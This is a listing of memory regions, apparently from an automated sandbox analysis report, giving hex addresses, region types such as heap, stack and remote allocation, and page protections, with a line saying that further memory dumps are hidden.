6D5000
|
heap
|
page read and write
|
||
|
4D6DF7B000
|
stack
|
page read and write
|
||
|
4EB3000
|
trusted library allocation
|
page read and write
|
||
|
4D6D97E000
|
unkown
|
page readonly
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
21BB3D50000
|
trusted library allocation
|
page read and write
|
||
|
21BB3CD0000
|
trusted library allocation
|
page read and write
|
||
|
867C000
|
heap
|
page read and write
|
||
|
2DBE000
|
heap
|
page read and write
|
||
|
70F0000
|
heap
|
page execute and read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
32BF000
|
stack
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
4D6DB7E000
|
unkown
|
page readonly
|
||
|
7110000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
2D8C000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
78E000
|
stack
|
page read and write
|
||
|
2C11000
|
heap
|
page read and write
|
||
|
2BA8000
|
heap
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
60F4000
|
trusted library allocation
|
page read and write
|
||
|
6312000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
81C0000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
31DD000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
21BB5000000
|
heap
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
21BB3EF2000
|
heap
|
page read and write
|
||
|
2D22000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2C5E000
|
unkown
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
22B9E000
|
stack
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
870E000
|
heap
|
page read and write
|
||
|
6333000
|
heap
|
page read and write
|
||
|
6E0000
|
direct allocation
|
page read and write
|
||
|
6342000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
59A9000
|
trusted library allocation
|
page read and write
|
||
|
21BAF8C0000
|
trusted library section
|
page readonly
|
||
|
4D72000
|
trusted library allocation
|
page read and write
|
||
|
4957000
|
trusted library allocation
|
page read and write
|
||
|
2C3F000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
494E000
|
stack
|
page read and write
|
||
|
22D30000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
22C7B000
|
unclassified section
|
page execute and read and write
|
||
|
21BAE800000
|
heap
|
page read and write
|
||
|
21BB4080000
|
remote allocation
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
21BAE8BD000
|
heap
|
page read and write
|
||
|
9866000
|
direct allocation
|
page execute and read and write
|
||
|
22FAC000
|
heap
|
page read and write
|
||
|
21BAE8A0000
|
heap
|
page read and write
|
||
|
699F000
|
remote allocation
|
page execute and read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
2C46000
|
heap
|
page read and write
|
||
|
2C4F000
|
heap
|
page read and write
|
||
|
21BB3DB0000
|
trusted library allocation
|
page read and write
|
||
|
6344000
|
heap
|
page read and write
|
||
|
86B2000
|
heap
|
page read and write
|
||
|
464E000
|
heap
|
page read and write
|
||
|
750000
|
direct allocation
|
page read and write
|
||
|
73E3000
|
heap
|
page read and write
|
||
|
2CF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
22EBA000
|
heap
|
page read and write
|
||
|
7F7B1000
|
trusted library allocation
|
page execute read
|
||
|
2E30000
|
heap
|
page execute and read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
2D25000
|
trusted library allocation
|
page execute and read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
2CDD000
|
stack
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
29ED000
|
heap
|
page read and write
|
||
|
760000
|
direct allocation
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
60F0000
|
trusted library allocation
|
page read and write
|
||
|
6D0000
|
direct allocation
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
463E000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
85CD000
|
heap
|
page read and write
|
||
|
4F8C000
|
trusted library allocation
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
22E41000
|
heap
|
page read and write
|
||
|
4B73000
|
heap
|
page read and write
|
||
|
21BAE929000
|
heap
|
page read and write
|
||
|
21BAF15A000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
4D6CA7E000
|
stack
|
page read and write
|
||
|
632F000
|
heap
|
page read and write
|
||
|
4D7F000
|
stack
|
page read and write
|
||
|
6329000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
2C3C000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
8634000
|
heap
|
page read and write
|
||
|
5991000
|
trusted library allocation
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
6336000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
4D6D17E000
|
unkown
|
page readonly
|
||
|
824D000
|
stack
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
21BAE895000
|
heap
|
page read and write
|
||
|
4F79000
|
trusted library allocation
|
page read and write
|
||
|
2AB5000
|
heap
|
page read and write
|
||
|
466F000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
2E24000
|
heap
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
8709000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
32FE000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
4EDA000
|
trusted library allocation
|
page read and write
|
||
|
2299C000
|
stack
|
page read and write
|
||
|
634D000
|
heap
|
page read and write
|
||
|
2E5C000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page readonly
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
7373000
|
heap
|
page read and write
|
||
|
465C000
|
heap
|
page read and write
|
||
|
6A0000
|
direct allocation
|
page read and write
|
||
|
634D000
|
heap
|
page read and write
|
||
|
4639000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
465C000
|
heap
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
6328000
|
heap
|
page read and write
|
||
|
2DB3000
|
heap
|
page read and write
|
There are 1292 hidden memdumps, click here to show them.